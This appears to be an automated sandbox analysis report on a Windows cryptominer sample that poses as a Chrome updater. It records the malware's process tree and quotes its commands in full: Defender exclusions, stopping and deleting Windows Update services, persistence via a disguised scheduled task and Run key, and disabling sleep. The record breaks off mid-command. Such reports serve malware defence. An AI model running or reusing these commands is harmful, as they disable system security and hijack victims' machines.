Analysis
- max time kernel: 149s
- max time network: 139s
- platform: windows10-2004_x64
- resource: win10v2004-20220812-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 27-09-2022 17:22
General
- Target: 35e3c1ca2fe9cee18e79de1b02972b0d010320a54e20113b7cb2ba063690f21e.exe
- Size: 7.9MB
- MD5: 8f76cc737082cc709dd4c9106c671ab6
- SHA1: ba5de16d94e73b551f0c6e5d81eb8ee9d8093d11
- SHA256: 35e3c1ca2fe9cee18e79de1b02972b0d010320a54e20113b7cb2ba063690f21e
- SHA512: b88ef3536b8af9677d189d5ed6fee9bdb0cda0e356bb4108ccf8f52211a5ac85b183f3edff3a8e723e79b6dfdce87d1450cdad5790cea35abfd283ed159f6ec2
- SSDEEP: 196608:+Al04HUfTrwa4FLxjAT0OR+xVHgbBlDmia6SMvzr:Gk3/FLxA0OR+biEmSwH
Malware Config
Signatures
-
Modifies security service: 2 TTPs, 5 IoCs
Processes: reg.exe
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters (reg.exe)
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security (reg.exe)
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 (reg.exe)
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 (reg.exe)
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo (reg.exe)
Identifies VirtualBox via ACPI registry values (likely anti-VM): 2 TTPs, 2 IoCs
Processes: 35e3c1ca2fe9cee18e79de1b02972b0d010320a54e20113b7cb2ba063690f21e.exe, updater.exe
- Key opened: \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ (35e3c1ca2fe9cee18e79de1b02972b0d010320a54e20113b7cb2ba063690f21e.exe)
- Key opened: \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ (updater.exe)
XMRig Miner payload: 2 IoCs
Yara rule matches (xmrig):
- behavioral1/memory/1220-226-0x00007FF645C80000-0x00007FF646474000-memory.dmp (xmrig)
- behavioral1/memory/1220-227-0x00007FF645C80000-0x00007FF646474000-memory.dmp (xmrig)
Drops file in Drivers directory: 2 IoCs
Processes: updater.exe, 35e3c1ca2fe9cee18e79de1b02972b0d010320a54e20113b7cb2ba063690f21e.exe
- File created: C:\Windows\system32\drivers\etc\hosts (updater.exe)
- File created: C:\Windows\system32\drivers\etc\hosts (35e3c1ca2fe9cee18e79de1b02972b0d010320a54e20113b7cb2ba063690f21e.exe)
Executes dropped EXE: 1 IoCs
Processes: updater.exe
- PID 1864 updater.exe
Stops running service(s): 3 TTPs
-
Yara rule matches (upx):
- behavioral1/memory/1220-226-0x00007FF645C80000-0x00007FF646474000-memory.dmp (upx)
- behavioral1/memory/1220-227-0x00007FF645C80000-0x00007FF646474000-memory.dmp (upx)
Checks BIOS information in registry: 2 TTPs, 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes: updater.exe, 35e3c1ca2fe9cee18e79de1b02972b0d010320a54e20113b7cb2ba063690f21e.exe
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion (updater.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (35e3c1ca2fe9cee18e79de1b02972b0d010320a54e20113b7cb2ba063690f21e.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion (35e3c1ca2fe9cee18e79de1b02972b0d010320a54e20113b7cb2ba063690f21e.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (updater.exe)
Yara rule matches (themida):
- behavioral1/memory/2636-132-0x00007FF63BF60000-0x00007FF63CE26000-memory.dmp (themida)
- behavioral1/memory/2636-133-0x00007FF63BF60000-0x00007FF63CE26000-memory.dmp (themida)
- behavioral1/memory/2636-135-0x00007FF63BF60000-0x00007FF63CE26000-memory.dmp (themida)
- behavioral1/memory/2636-136-0x00007FF63BF60000-0x00007FF63CE26000-memory.dmp (themida)
- behavioral1/memory/2636-137-0x00007FF63BF60000-0x00007FF63CE26000-memory.dmp (themida)
- behavioral1/memory/2636-138-0x00007FF63BF60000-0x00007FF63CE26000-memory.dmp (themida)
- behavioral1/memory/2636-139-0x00007FF63BF60000-0x00007FF63CE26000-memory.dmp (themida)
- behavioral1/memory/2636-166-0x00007FF63BF60000-0x00007FF63CE26000-memory.dmp (themida)
- C:\Program Files\Google\Chrome\updater.exe (themida)
- behavioral1/memory/1864-173-0x00007FF78C0A0000-0x00007FF78CF66000-memory.dmp (themida)
- behavioral1/memory/1864-174-0x00007FF78C0A0000-0x00007FF78CF66000-memory.dmp (themida)
- behavioral1/memory/1864-175-0x00007FF78C0A0000-0x00007FF78CF66000-memory.dmp (themida)
- behavioral1/memory/1864-176-0x00007FF78C0A0000-0x00007FF78CF66000-memory.dmp (themida)
- behavioral1/memory/1864-177-0x00007FF78C0A0000-0x00007FF78CF66000-memory.dmp (themida)
- behavioral1/memory/1864-179-0x00007FF78C0A0000-0x00007FF78CF66000-memory.dmp (themida)
- behavioral1/memory/1864-180-0x00007FF78C0A0000-0x00007FF78CF66000-memory.dmp (themida)
- behavioral1/memory/1864-222-0x00007FF78C0A0000-0x00007FF78CF66000-memory.dmp (themida)
- C:\Program Files\Google\Chrome\updater.exe (themida)
Checks whether UAC is enabled
Processes: 35e3c1ca2fe9cee18e79de1b02972b0d010320a54e20113b7cb2ba063690f21e.exe, updater.exe
- Key value queried: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (35e3c1ca2fe9cee18e79de1b02972b0d010320a54e20113b7cb2ba063690f21e.exe)
- Key value queried: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (updater.exe)
Drops file in System32 directory: 3 IoCs
Processes: powershell.exe, powershell.exe
- File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (powershell.exe)
- File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log (powershell.exe)
- File opened for modification: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (powershell.exe)
Suspicious use of NtSetInformationThreadHideFromDebugger: 2 IoCs
Processes: 35e3c1ca2fe9cee18e79de1b02972b0d010320a54e20113b7cb2ba063690f21e.exe, updater.exe
- PID 2636 35e3c1ca2fe9cee18e79de1b02972b0d010320a54e20113b7cb2ba063690f21e.exe
- PID 1864 updater.exe
Suspicious use of SetThreadContext: 2 IoCs
Processes: updater.exe
- PID 1864 (updater.exe) set thread context of 3100 (conhost.exe)
- PID 1864 (updater.exe) set thread context of 1220 (conhost.exe)
Drops file in Program Files directory: 4 IoCs
Processes: cmd.exe, cmd.exe, 35e3c1ca2fe9cee18e79de1b02972b0d010320a54e20113b7cb2ba063690f21e.exe, updater.exe
- File created: C:\Program Files\Google\Libs\g.log (cmd.exe)
- File created: C:\Program Files\Google\Libs\g.log (cmd.exe)
- File created: C:\Program Files\Google\Chrome\updater.exe (35e3c1ca2fe9cee18e79de1b02972b0d010320a54e20113b7cb2ba063690f21e.exe)
- File created: C:\Program Files\Google\Libs\WR64.sys (updater.exe)
Launches sc.exe: 10 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes: sc.exe (10 instances)
- PID 4936 sc.exe
- PID 2148 sc.exe
- PID 4088 sc.exe
- PID 3872 sc.exe
- PID 2856 sc.exe
- PID 4356 sc.exe
- PID 5020 sc.exe
- PID 4308 sc.exe
- PID 3916 sc.exe
- PID 3556 sc.exe
Modifies data under HKEY_USERS: 64 IoCs
Processes: powershell.exe, powershell.exe (every entry below was recorded for powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"
Suspicious behavior: EnumeratesProcesses: 64 IoCs
Processes: powershell.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe, conhost.exe
- PID 4976 powershell.exe (recorded twice)
- PID 5036 powershell.exe (recorded twice)
- PID 4532 powershell.exe (recorded twice)
- PID 2644 powershell.exe (recorded twice)
- PID 312 powershell.exe (recorded twice)
- PID 1220 conhost.exe (all remaining entries are for this PID)
Suspicious behavior: LoadsDriver: 1 IoCs
Processes:
- PID 656
Suspicious use of AdjustPrivilegeToken: 64 IoCs
Processes: powershell.exe, powershell.exe, powercfg.exe, powercfg.exe, powercfg.exe, powercfg.exe
- Token: SeDebugPrivilege (PID 4976 powershell.exe)
- Token: SeDebugPrivilege (PID 5036 powershell.exe)
- Token: SeShutdownPrivilege (PID 4512 powercfg.exe)
- Token: SeCreatePagefilePrivilege (PID 4512 powercfg.exe)
- Token: SeShutdownPrivilege (PID 2036 powercfg.exe)
- Token: SeCreatePagefilePrivilege (PID 2036 powercfg.exe)
- Token: SeShutdownPrivilege (PID 2224 powercfg.exe)
- Token: SeCreatePagefilePrivilege (PID 2224 powercfg.exe)
- Token: SeShutdownPrivilege (PID 3908 powercfg.exe)
- Token: SeCreatePagefilePrivilege (PID 3908 powercfg.exe)
The following token sequence is then recorded for PID 5036 powershell.exe twice in full, and a third time up to and including SeShutdownPrivilege:
- Token: SeIncreaseQuotaPrivilege (PID 5036 powershell.exe)
- Token: SeSecurityPrivilege (PID 5036 powershell.exe)
- Token: SeTakeOwnershipPrivilege (PID 5036 powershell.exe)
- Token: SeLoadDriverPrivilege (PID 5036 powershell.exe)
- Token: SeSystemProfilePrivilege (PID 5036 powershell.exe)
- Token: SeSystemtimePrivilege (PID 5036 powershell.exe)
- Token: SeProfSingleProcessPrivilege (PID 5036 powershell.exe)
- Token: SeIncBasePriorityPrivilege (PID 5036 powershell.exe)
- Token: SeCreatePagefilePrivilege (PID 5036 powershell.exe)
- Token: SeBackupPrivilege (PID 5036 powershell.exe)
- Token: SeRestorePrivilege (PID 5036 powershell.exe)
- Token: SeShutdownPrivilege (PID 5036 powershell.exe)
- Token: SeDebugPrivilege (PID 5036 powershell.exe)
- Token: SeSystemEnvironmentPrivilege (PID 5036 powershell.exe)
- Token: SeRemoteShutdownPrivilege (PID 5036 powershell.exe)
- Token: SeUndockPrivilege (PID 5036 powershell.exe)
- Token: SeManageVolumePrivilege (PID 5036 powershell.exe)
- Token: 33 (PID 5036 powershell.exe)
- Token: 34 (PID 5036 powershell.exe)
- Token: 35 (PID 5036 powershell.exe)
- Token: 36 (PID 5036 powershell.exe)
Suspicious use of WriteProcessMemory: 64 IoCs
Processes: 35e3c1ca2fe9cee18e79de1b02972b0d010320a54e20113b7cb2ba063690f21e.exe, cmd.exe, cmd.exe, powershell.exe, updater.exe, cmd.exe, cmd.exe
Each of the following parent/target pairs is recorded twice in the report:
- PID 2636 (35e3c1ca2fe9cee18e79de1b02972b0d010320a54e20113b7cb2ba063690f21e.exe) wrote to memory of 4976 (powershell.exe)
- PID 2636 (35e3c1ca2fe9cee18e79de1b02972b0d010320a54e20113b7cb2ba063690f21e.exe) wrote to memory of 1248 (cmd.exe)
- PID 2636 (35e3c1ca2fe9cee18e79de1b02972b0d010320a54e20113b7cb2ba063690f21e.exe) wrote to memory of 5016 (cmd.exe)
- PID 2636 (35e3c1ca2fe9cee18e79de1b02972b0d010320a54e20113b7cb2ba063690f21e.exe) wrote to memory of 5036 (powershell.exe)
- PID 1248 (cmd.exe) wrote to memory of 4936 (sc.exe)
- PID 5016 (cmd.exe) wrote to memory of 4512 (powercfg.exe)
- PID 1248 (cmd.exe) wrote to memory of 5020 (sc.exe)
- PID 5016 (cmd.exe) wrote to memory of 2036 (powercfg.exe)
- PID 1248 (cmd.exe) wrote to memory of 4308 (sc.exe)
- PID 5016 (cmd.exe) wrote to memory of 2224 (powercfg.exe)
- PID 5016 (cmd.exe) wrote to memory of 3908 (powercfg.exe)
- PID 1248 (cmd.exe) wrote to memory of 3916 (sc.exe)
- PID 1248 (cmd.exe) wrote to memory of 3556 (sc.exe)
- PID 1248 (cmd.exe) wrote to memory of 1440 (reg.exe)
- PID 1248 (cmd.exe) wrote to memory of 5084 (reg.exe)
- PID 1248 (cmd.exe) wrote to memory of 2660 (reg.exe)
- PID 1248 (cmd.exe) wrote to memory of 344 (reg.exe)
- PID 1248 (cmd.exe) wrote to memory of 2484 (reg.exe)
- PID 2636 (35e3c1ca2fe9cee18e79de1b02972b0d010320a54e20113b7cb2ba063690f21e.exe) wrote to memory of 4532 (powershell.exe)
- PID 4532 (powershell.exe) wrote to memory of 5080 (schtasks.exe)
- PID 1864 (updater.exe) wrote to memory of 2644 (powershell.exe)
- PID 1864 (updater.exe) wrote to memory of 1032 (cmd.exe)
- PID 1864 (updater.exe) wrote to memory of 4212 (cmd.exe)
- PID 4212 (cmd.exe) wrote to memory of 4648 (powercfg.exe)
- PID 1864 (updater.exe) wrote to memory of 312 (powershell.exe)
- PID 1032 (cmd.exe) wrote to memory of 3872 (sc.exe)
- PID 4212 (cmd.exe) wrote to memory of 3668 (powercfg.exe)
- PID 1032 (cmd.exe) wrote to memory of 2148 (sc.exe)
- PID 1032 (cmd.exe) wrote to memory of 4088 (sc.exe)
- PID 4212 (cmd.exe) wrote to memory of 1552 (powercfg.exe)
- PID 4212 (cmd.exe) wrote to memory of 4140 (powercfg.exe)
- PID 1032 (cmd.exe) wrote to memory of 2856 (sc.exe)
Processes
Each entry gives the process image, its command line, and the signatures it triggered; the bracketed number is the depth in the process tree.
- [1] C:\Users\Admin\AppData\Local\Temp\35e3c1ca2fe9cee18e79de1b02972b0d010320a54e20113b7cb2ba063690f21e.exe
  Command: "C:\Users\Admin\AppData\Local\Temp\35e3c1ca2fe9cee18e79de1b02972b0d010320a54e20113b7cb2ba063690f21e.exe"
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Drops file in Drivers directory
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Drops file in Program Files directory
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command: powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  - [2] C:\Windows\SYSTEM32\cmd.exe
    Command: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\sc.exe
      Command: sc stop UsoSvc
      - Launches sc.exe
    - [3] C:\Windows\system32\sc.exe
      Command: sc stop WaaSMedicSvc
      - Launches sc.exe
    - [3] C:\Windows\system32\sc.exe
      Command: sc stop wuauserv
      - Launches sc.exe
    - [3] C:\Windows\system32\sc.exe
      Command: sc stop bits
      - Launches sc.exe
    - [3] C:\Windows\system32\sc.exe
      Command: sc stop dosvc
      - Launches sc.exe
    - [3] C:\Windows\system32\reg.exe
      Command: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    - [3] C:\Windows\system32\reg.exe
      Command: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    - [3] C:\Windows\system32\reg.exe
      Command: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
      - Modifies security service
    - [3] C:\Windows\system32\reg.exe
      Command: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    - [3] C:\Windows\system32\reg.exe
      Command: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  - [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command: powershell <#qauvexd#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  - [2] C:\Windows\SYSTEM32\cmd.exe
    Command: cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\powercfg.exe
      Command: powercfg /x -hibernate-timeout-ac 0
      - Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\system32\powercfg.exe
      Command: powercfg /x -hibernate-timeout-dc 0
      - Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\system32\powercfg.exe
      Command: powercfg /x -standby-timeout-ac 0
      - Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\system32\powercfg.exe
      Command: powercfg /x -standby-timeout-dc 0
      - Suspicious use of AdjustPrivilegeToken
  - [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command: powershell <#ceflnjkax#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\schtasks.exe
      Command: "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
- [1] C:\Program Files\Google\Chrome\updater.exe
  Command: "C:\Program Files\Google\Chrome\updater.exe"
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - Drops file in Program Files directory
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command: powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
  - [2] C:\Windows\system32\cmd.exe
    Command: cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\powercfg.exe
      Command: powercfg /x -hibernate-timeout-ac 0
    - [3] C:\Windows\system32\powercfg.exe
      Command: powercfg /x -hibernate-timeout-dc 0
    - [3] C:\Windows\system32\powercfg.exe
      Command: powercfg /x -standby-timeout-ac 0
    - [3] C:\Windows\system32\powercfg.exe
      Command: powercfg /x -standby-timeout-dc 0
  - [2] C:\Windows\system32\cmd.exe
    Command: cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\sc.exe
      Command: sc stop UsoSvc
      - Launches sc.exe
    - [3] C:\Windows\system32\sc.exe
      Command: sc stop WaaSMedicSvc
      - Launches sc.exe
    - [3] C:\Windows\system32\sc.exe
      Command: sc stop wuauserv
      - Launches sc.exe
    - [3] C:\Windows\system32\sc.exe
      Command: sc stop bits
      - Launches sc.exe
    - [3] C:\Windows\system32\sc.exe
      Command: sc stop dosvc
      - Launches sc.exe
    - [3] C:\Windows\system32\reg.exe
      Command: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    - [3] C:\Windows\system32\reg.exe
      Command: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    - [3] C:\Windows\system32\reg.exe
      Command: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    - [3] C:\Windows\system32\reg.exe
      Command: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    - [3] C:\Windows\system32\reg.exe
      Command: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  - [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command: powershell <#qauvexd#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program 